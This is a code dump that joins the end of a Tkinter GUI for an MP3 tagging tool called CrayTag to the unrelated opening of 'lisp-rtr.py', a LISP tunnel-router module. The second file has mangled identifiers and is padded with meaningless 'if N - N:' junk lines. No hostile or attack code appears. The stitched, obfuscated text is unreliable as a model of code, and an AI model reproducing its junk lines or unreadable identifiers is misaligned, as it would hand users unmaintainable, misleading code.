s = Label(root, text='Change all Genres to:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
s.place(bordermode=OUTSIDE, height=25, width=160,relx=0, rely=0.862, anchor=NW)
choices3 = ['Dont Change','Acapella', 'Acid', 'Acid Jazz', 'Acid Punk', 'Acoustic', 'Alternative', 'Alternative Rock', 'Ambient','ASMR', 'Anime', 'Avantgarde', 'Ballad', 'Bass', 'Beat', 'Bebob', 'Big Band', 'Black Metal', 'Bluegrass', 'Blues', 'Booty Bass', 'BritPop', 'Cabaret', 'Celtic', 'Chamber Music', 'Chanson', 'Chorus', 'Christian Gangsta Rap', 'Christian Rap', 'Christian Rock', 'Classic Rock', 'Classical', 'Club', 'Comedy', 'Contemporary Christian', 'Country', 'Crossover', 'Cult', 'Dance', 'Dance Hall', 'Darkwave', 'Death Metal', 'Disco', 'Dream', 'Drum & Bass', 'Drum Solo', 'Duet', 'Easy Listening', 'Egypt', 'Electronic', 'Ethnic', 'Euro-House', 'Euro-Techno', 'Eurodance', 'Fast Fusion', 'Folk', 'Folk-Rock', 'Folklore', 'Freestyle', 'Funk', 'Fusion', 'Game', 'Gangsta', 'Goa', 'Gospel', 'Gothic', 'Gothic Rock', 'Grunge', 'Hard Rock', 'Hardcore', 'Heavy Metal', 'Hip-Hop', 'House', 'House', 'Humour', 'Indie', 'Industrial', 'Instrumental', 'Instrumental Pop', 'Instrumental Rock', 'JPop', 'Jazz', 'Jazz+Funk', 'Jungle', 'Latin', 'Lo-Fi', 'Meditative', 'Merengue', 'Metal', 'Musical', 'National Folk', 'Native US', 'Negerpunk', 'New Age', 'New Wave', 'Noise', 'Oldies', 'Opera', 'Other', 'Polka', 'Polsk Punk', 'Pop', 'Pop-Folk', 'Pop-Funk', 'Porn Groove', 'Power Ballad', 'Pranks', 'Primus', 'Progressive Rock', 'Psychadelic', 'Psychedelic Rock', 'Punk', 'Punk Rock', 'R&B', 'Rap', 'Rave', 'Reggae', 'Retro', 'Revival', 'Rhythmic Soul', 'Rock','Russian','Rpop','RusPop', 'Rock & Roll', 'Salsa', 'Samba', 'Satire', 'Showtunes', 'Ska', 'Slow Jam', 'Slow Rock', 'Sonata', 'Soul', 'Sound Clip', 'Soundtrack', 'Southern Rock', 'Space', 'Speech', 'Swing', 'Symphonic Rock', 'Symphony', 'Synthpop', 'Tango', 'Techno', 'Techno-Industrial', 'Terror', 'Thrash Metal', 'Top 40', 'Trailer', 'Trance', 'Tribal', 'Trip-Hop', 'Unknown', 'Vocal', 'Vocal']
tkvar3 = StringVar(root)
def setter3(kilo):
if tkvar3.get()==choices3[0]:
ram.ChangeAllGenres=False
d.config(text='Disabled Changing Genre.')
else:
ram.GenreToChangeTo=str(tkvar3.get())
ram.ChangeAllGenres=True
d.config(text='Will Change Genres to: '+ram.GenreToChangeTo)
popupMenu3 = OptionMenu(root, tkvar3, *choices3,command=setter3)
popupMenu3.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu3["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu3.place(bordermode=OUTSIDE, height=25, width=240,relx=0.26, rely=0.862, anchor=NW)
tkvar3.set(choices3[0])
scroll = Scrollbar(root)
scroll.place(relx=1, rely=0, anchor=NE,height=200, width=15)
vexx = Text(root, wrap=WORD, yscrollcommand=scroll.set)
dearWorld="""\n\n\n\n\n\n\n\n\n\n\nInstructions Below.\n
----------------------
Welcome to CrayTag """+ver.sion+"""
By: Dalton Overlin.
----------------------
These instructions will help you better understand CrayTag and how to use it.
----------------------
----------------------
Type or Select Path of Folder to Process (or "Browse" button)
----------------------
The text box allows you to manually type the path of the folder to be processed (meaning the folder holding mp3s for processing). The "Browse" button opens a GUI window to select the folder for processing. That way you don't have to manually type out the path.
----------------------
Notify to Add Missing Album Artist (Checkbox)
----------------------
When this option is checked, if the program finds an album with no defined artist name while processing your mp3 files, it will pop up asking you to add the missing artist name. If you uncheck the box it will not notify you to add the missing data.
----------------------
Notify to Add Missing Album Cover (Checkbox)
----------------------
When this option is checked, if the program finds an album with no defined album cover while processing your mp3 files, it will pop up asking you to add the missing album cover. If you uncheck the box it will not notify you to add the missing cover.
----------------------
Notify to Add Missing Album Name (Checkbox)
----------------------
When this option is checked, if the program finds an album with no defined album name while processing your mp3 files, it will pop up asking you to add the missing album name. If you uncheck the box it will not notify you to add the missing album name.
----------------------
Resize Album Cover to: (dropdown menu)
----------------------
This allows you to select the size that album art will be resized to; both embedded and standalone album covers are resized to this size. For this option you don't need to click the "Save Custom" button, as changing the dropdown value immediately sets it.
----------------------
or Custom: & "Save Custom" button (for custom album art size)
----------------------
This option allows you to set a custom album cover size by either typing a numeric value or by using the toggle option to increase or decrease the value. Once you've set the custom size you must click the "Save Custom" button for the custom album cover size to be set.
----------------------
Renumber mp3 Filenames: (checkbox)
----------------------
When this box is checked it will carry out the file renumbering process. If the box is not checked it will not renumber the files.
----------------------
Renumbering Example Style (Dropdown Menu)
----------------------
This dropdown menu will give you options for different renumbering styles to choose from.
----------------------
Change all Genres to: (dropdown menu)
----------------------
If you leave this option at "Dont Change" then the program will not change the genre of any files being processed. If you do change the option, then every file the program processes will have its genre changed to the new value.
----------------------
Delete Embedded (dropdown menu)
----------------------
By default this option is set to No; when set to No it will not remove embedded album art. If you set this option to Yes then all embedded album art in your mp3 files will be removed. This is a way of stripping all embedded album art.
----------------------
Resize JPG File (dropdown menu)
----------------------
By default this option is set to No; when set to No it will not resize external album art (external meaning album art stored as separate image files). If you set this option to Yes then all external album art will be resized.
----------------------
Embed Cover (dropdown menu)
----------------------
By default, this option is set to Yes; when set to Yes it will embed album art into mp3 files. If you set this option to No then new album art will not be embedded into the mp3 files. This option does not strip embedded album covers; it just prevents new embedded album covers from being set when the option is No.
----------------------
Keep Backup (dropdown menu)
----------------------
By default, this option is set to Yes. This option controls whether or not a backup of an embedded album cover will be made before resizing. This is done by extracting embedded album art and storing it as an external image file. Yes means a backup will be made. No means a backup will not be made.
----------------------
Start (button)
----------------------
This button is notably larger than the rest and is located at the bottom right of the main GUI window. Once you have defined a directory to process (and, optionally, any additional settings), simply click the "Start" button and the program will start processing the files.
----------------------
Settings (button with fish image)
----------------------
This button opens a new window with additional options. The first option lets you specify custom names for album covers to look for, while the second option lets you define files to be deleted during the scanning process. This means that if you list a filename like "folder.jpg" to be deleted, the program will delete that file whenever it comes across it while scanning the directory you define.
----------------------
Processing Window
----------------------
This window will display while the program is processing your files. It shows live feedback about the albums currently being processed. If you want to cancel processing, just click the X button at the top right of the window. Once you do, it will pop up asking whether you want to cancel the running processes.
----------------------
Feedback Area
----------------------
There is a small text area at the bottom left of the main program window. This text area will give you feedback whenever you change a setting. After processing files, this text area also reports how many files were processed.
"""
vexx.insert("1.0", dearWorld)
vexx.config(state=DISABLED,bg='#000099',fg='#00ffff')
vexx.place(bordermode=OUTSIDE, height=202, width=186,relx=0.975, rely=0, anchor=NE)
scroll.config(command=vexx.yview)
h4 = Label(root, text='Delete Embedded',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h4.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.5018, anchor=NW)
f5 = Label(root, text='Resize JPG File',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
f5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.562, anchor=NW)
g5 = Label(root, text='Embed Cover',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
g5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.622, anchor=NW)
h5 = Label(root, text='Keep Backup',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.682, anchor=NW)
choices5 = ['No, do not resize JPG files.','Yes, resize JPG files.']
tkvar5 = StringVar(root)
def setter5(kilo):
if tkvar5.get()==choices5[0] or tkvar5.get()=='No':
d.config(text='Will not resize JPG files used as cover.')
ram.DontResiveJPG=False
else:
d.config(text='Will resize JPG files used as cover.')
ram.DontResiveJPG=True
popupMenu5 = OptionMenu(root, tkvar5, *choices5,command=setter5)
popupMenu5.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu5["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu5.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.562, anchor=NW)
tkvar5.set('No')
choices6 = ['No, do not embed album cover in mp3s.','Yes, embed album cover in mp3s.']
tkvar6 = StringVar(root)
def setter6(kilo):
if tkvar6.get()==choices6[1] or tkvar6.get()=='Yes':
d.config(text='Will embed cover in mp3s.')
ram.WillEmbedArt=True
else:
d.config(text='Will not embed cover in mp3s.')
ram.WillEmbedArt=False
popupMenu6 = OptionMenu(root, tkvar6, *choices6,command=setter6)
popupMenu6.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu6["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu6.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.622, anchor=NW)
tkvar6.set('Yes')
choices7 = ['No, do not keep backup, meaning do not store a JPG before resizing.','Yes, keep backup, meaning do not delete the JPG file.']
tkvar7 = StringVar(root)
def setter7(kilo):
if tkvar7.get()==choices7[1] or tkvar7.get()=='Yes':
d.config(text='Will keep backup by storing JPG before resizing embedded art.')
ram.KeepBackup=True
else:
d.config(text='Will not keep backup by storing JPG before resizing embedded art.')
ram.KeepBackup=False
popupMenu7 = OptionMenu(root, tkvar7, *choices7,command=setter7)
popupMenu7.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu7["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu7.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.682, anchor=NW)
tkvar7.set('Yes')
choices8 = ['No, do not remove embedded album art.','Yes, remove embedded album art.']
tkvar8 = StringVar(root)
def setter8(kilo):
if tkvar8.get()==choices8[0] or tkvar8.get()=='No':
d.config(text='Will not remove embedded album art.')
ram.DeleteEmbedded=False
ram.WillEmbedArt=True
else:
d.config(text='Will remove embedded album art.')
ram.DeleteEmbedded=True
ram.WillEmbedArt=False
popupMenu8 = OptionMenu(root, tkvar8, *choices8,command=setter8)
popupMenu8.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu8["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu8.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.5018, anchor=NW)
tkvar8.set('No')
background_image7=tkinter.PhotoImage(data = img.D)
root.iconphoto(False, background_image7)
root.deiconify()
root.mainloop()
mainCat('Notification Area: CrayTag '+ver.sion)
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsulating Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = None
Ii1IIii11 = None
Oooo0000 = None
if 22 - 22: Ii1I . IiII
I11 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
if 48 - 48: OoooooooOO % o0oOOo0O0Ooo . I1IiiI - Ii1I % i1IIi % OoooooooOO
if 3 - 3: iII111i + O0
if 42 - 42: OOooOOo / i1IIi + i11iIiiIii - Ii1I
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
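# Flags read from the environment: these booleans are True when LISP_RTR_FAST_DATA_PLANE / LISP_RTR_LATENCY_DEBUG are set.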
if 90 - 90: II111iiii + oO0o / o0oOOo0O0Ooo % II111iiii - O0
if 29 - 29: o0oOOo0O0Ooo / iIii1I11I1II1
if 24 - 24: O0 % o0oOOo0O0Ooo + i1IIi + I1Ii111 + I1ii11iIi11i
if 70 - 70: Oo0Ooo % Oo0Ooo . IiII % OoO0O00 * o0oOOo0O0Ooo % oO0o
if 23 - 23: i11iIiiIii + I1IiiI
if 68 - 68: OoOoOO00 . oO0o . i11iIiiIii
if 40 - 40: oO0o . OoOoOO00 . Oo0Ooo . i1IIi
if 33 - 33: Ii1I + II111iiii % i11iIiiIii . ooOoO0o - I1IiiI
def O00oooo0O ( parameter ) :
global I11
if 22 - 22: OoooooooOO % I11i - iII111i . iIii1I11I1II1 * i11iIiiIii
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
I11 ) )
if 32 - 32: Oo0Ooo * O0 % oO0o % Ii1I . IiII
if 61 - 61: ooOoO0o
if 79 - 79: Oo0Ooo + I1IiiI - iII111i
if 83 - 83: ooOoO0o
if 64 - 64: OoO0O00 % ooOoO0o % iII111i / OoOoOO00 - OoO0O00
if 74 - 74: iII111i * O0
if 89 - 89: oO0o + Oo0Ooo
def Ii1IOo0o0 ( parameter ) :
global I11
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , I11 ,
True ) )
if 48 - 48: I11i + I11i / II111iiii / iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
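#
# "lisp database-mapping" command handler. Passes the parsed keyword/value
# pairs to lispconfig.lisp_database_mapping_command().
#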
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
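#
# Glean-mapping command handler. Builds a dictionary describing which EIDs,
# groups, RLOCs and instance-IDs may be gleaned (plus the rloc-probe and
# igmp-query flags) and appends it to lisp.lisp_glean_mappings, unless an
# identical entry already exists.
#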
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
for O0o0 in kv_pair . keys ( ) :
OO00Oo = kv_pair [ O0o0 ]
if 51 - 51: IiII * o0oOOo0O0Ooo + I11i + OoO0O00
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if 86 - 86: I11i / IiII % i11iIiiIii
if 7 - 7: ooOoO0o * OoO0O00 % oO0o . IiII
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if 62 - 62: iIii1I11I1II1 * OoOoOO00
if ( O0o0 == "group-prefix" ) :
i1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1 . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1
if 91 - 91: OoO0O00 . I1ii11iIi11i + OoO0O00 - iII111i / OoooooooOO
if ( O0o0 == "rloc-prefix" ) :
iII1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1 . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = iII1
if 30 - 30: II111iiii - OOooOOo - i11iIiiIii % OoOoOO00 - II111iiii * Ii1I
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if 61 - 61: oO0o - I11i % OOooOOo
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
if 84 - 84: oO0o * OoO0O00 / I11i - O0
if 30 - 30: iIii1I11I1II1 / ooOoO0o - I1Ii111 - II111iiii % iII111i
if 49 - 49: I1IiiI % ooOoO0o . ooOoO0o . I11i * ooOoO0o
if 97 - 97: Ii1I + o0oOOo0O0Ooo . OOooOOo + I1ii11iIi11i % iII111i
if 95 - 95: i1IIi
if 3 - 3: I1Ii111 - O0 / I1Ii111 % OoO0O00 / I1Ii111 . I1IiiI
for iiI111I1iIiI in lisp . lisp_glean_mappings :
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) ^ oO0Oo . has_key ( "eid-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) and oO0Oo . has_key ( "eid-prefix" ) ) :
II = iiI111I1iIiI [ "eid-prefix" ]
Ii1I1IIii1II = oO0Oo [ "eid-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 65 - 65: Ii1I . iIii1I11I1II1 / O0 - Ii1I
if 21 - 21: I1IiiI * iIii1I11I1II1
if ( iiI111I1iIiI . has_key ( "group-prefix" ) ^ oO0Oo . has_key ( "group-prefix" ) ) :
continue
if 91 - 91: IiII
if ( iiI111I1iIiI . has_key ( "group-prefix" ) and oO0Oo . has_key ( "group-prefix" ) ) :
II = iiI111I1iIiI [ "group-prefix" ]
Ii1I1IIii1II = oO0Oo [ "group-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 15 - 15: II111iiii
if 18 - 18: i11iIiiIii . i1IIi % OoooooooOO / O0
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) ^ oO0Oo . has_key ( "rloc-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) and oO0Oo . has_key ( "rloc-prefix" ) ) :
II = iiI111I1iIiI [ "rloc-prefix" ]
Ii1I1IIii1II = oO0Oo [ "rloc-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if 75 - 75: OoOoOO00 % o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1Ii111
if 5 - 5: o0oOOo0O0Ooo * ooOoO0o + OoOoOO00 . OOooOOo + OoOoOO00
if ( iiI111I1iIiI . has_key ( "instance-id" ) ^ oO0Oo . has_key ( "instance-id" ) ) : continue
if ( iiI111I1iIiI . has_key ( "instance-id" ) and oO0Oo . has_key ( "instance-id" ) ) :
II = iiI111I1iIiI [ "instance-id" ]
Ii1I1IIii1II = oO0Oo [ "instance-id" ]
if ( II != Ii1I1IIii1II ) : continue
if 91 - 91: O0
if 61 - 61: II111iiii
if 64 - 64: ooOoO0o / OoOoOO00 - O0 - I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
return
lisp . lisp_glean_mappings . append ( oO0Oo )
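#
# RTR "show rloc-probing" command handler. Delegates to
# lispconfig.lisp_itr_rtr_show_rloc_probe_command().
#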
def iiI1I11i1i ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
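#
# Map-cache walk callback used when an Info-Request reveals that a NAT'd
# xTR's translated address or port has changed. Updates matching RLE nodes
# and RLOC entries with the new translated RLOC/port, copies any stored
# encap crypto keys under the new address:port, and, when RLOC-probing is
# enabled, sends a Map-Request to probe the new address.
#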
def IIIII11I1IiI ( mc , parms ) :
i1I , iII1 , OoOO , ooOOO0 = parms
if 65 - 65: O0
oO00OOoO00 = "{}:{}" . format ( iII1 . print_address_no_iid ( ) , OoOO )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
IiI111111IIII = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( ooOOO0 , lisp . red ( oO00OOoO00 , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
if 37 - 37: I1Ii111 / OoOoOO00
if 23 - 23: O0
for o00oO0oOo00 in mc . rloc_set :
if ( o00oO0oOo00 . rle ) :
for oO0oOo0 in o00oO0oOo00 . rle . rle_nodes :
if ( oO0oOo0 . rloc_name != ooOOO0 ) : continue
oO0oOo0 . store_translated_rloc ( iII1 , OoOO )
I1I1I = oO0oOo0 . address . print_address_no_iid ( ) + ":" + str ( oO0oOo0 . translated_port )
if 95 - 95: II111iiii + o0oOOo0O0Ooo + iII111i * iIii1I11I1II1 % oO0o / IiII
lisp . lprint ( IiI111111IIII . format ( "RLE" , I1I1I ) )
if 56 - 56: iII111i
if 86 - 86: II111iiii % I1Ii111
if 15 - 15: i1IIi * I1IiiI + i11iIiiIii
if ( o00oO0oOo00 . rloc_name != ooOOO0 ) : continue
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
if 53 - 53: II111iiii
if 31 - 31: OoO0O00
if 80 - 80: I1Ii111 . i11iIiiIii - o0oOOo0O0Ooo
I1I1I = o00oO0oOo00 . rloc . print_address_no_iid ( ) + ":" + str ( o00oO0oOo00 . translated_port )
if 25 - 25: OoO0O00
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( I1I1I ) ) :
oOo0oO = lisp . lisp_crypto_keys_by_rloc_encap [ I1I1I ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO00OOoO00 ] = oOo0oO
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
if 78 - 78: i11iIiiIii / iII111i - Ii1I / OOooOOo + oO0o
if 82 - 82: Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
o00oO0oOo00 . delete_from_rloc_probe_list ( mc . eid , mc . group )
o00oO0oOo00 . store_translated_rloc ( iII1 , OoOO )
o00oO0oOo00 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( IiI111111IIII . format ( "RLOC" , I1I1I ) )
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
if ( lisp . lisp_rloc_probing ) :
o0oOO000oO0oo = None if ( mc . group . is_null ( ) ) else mc . eid
oOO00O = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( i1I , 0 , o0oOO000oO0oo , oOO00O , o00oO0oOo00 )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
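#
# Map-cache walk wrapper for the callback above. For (S,G) entries it walks
# the per-source cache; unicast entries are handled directly.
#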
def OoOOoOooooOOo ( mc , parms ) :
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if ( mc . group . is_null ( ) ) : return ( IIIII11I1IiI ( mc , parms ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if ( mc . source_cache == None ) : return ( True , parms )
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
mc . source_cache . walk_cache ( IIIII11I1IiI , parms )
return ( True , parms )
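#
# Walk the entire map-cache, applying the translated-address update callback
# for the hostname, RLOC and port learned from an Info-Request.
#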
def o00oo0 ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( OoOOoOooooOOo ,
[ sockets , rloc , port , hostname ] )
return
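#
# Fast data-plane logging helper. When data-plane logging is enabled, prints
# a hex dump of the leading IP (and, for Encap/Decap, UDP and LISP) header
# bytes of the packet.
#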
def o00Oo0oooooo ( sred , packet ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if ( sred in [ "Send" , "Receive" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] ,
o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] , o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ,
# iIii1I11I1II1 / I11i . OoO0O00 - o0oOOo0O0Ooo
o0o [ 40 : 48 ] , o0o [ 48 : 56 ] , o0o [ 56 : 64 ] , o0o [ 64 : 72 ] ) )
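#
# Log the result (hit or miss) of a fast-path map-cache lookup when
# data-plane logging is enabled.
#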
def ii ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
if 68 - 68: iII111i - I1IiiI / I1Ii111 / I11i
I11iiii = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , I11iiii ) )
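#
# Latency instrumentation helper, active only when LISP_RTR_LATENCY_DEBUG is
# set. Call with ts=None to obtain a start timestamp; call again with that
# timestamp to log the elapsed time in microseconds.
#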
def o0O ( ts , msg ) :
global I1I11I1I1I
if 84 - 84: OoO0O00 + i1IIi - II111iiii . I1ii11iIi11i * OoooooooOO + I1IiiI
if ( I1I11I1I1I == False ) : return ( None )
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if ( ts == None ) : return ( time . time ( ) )
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
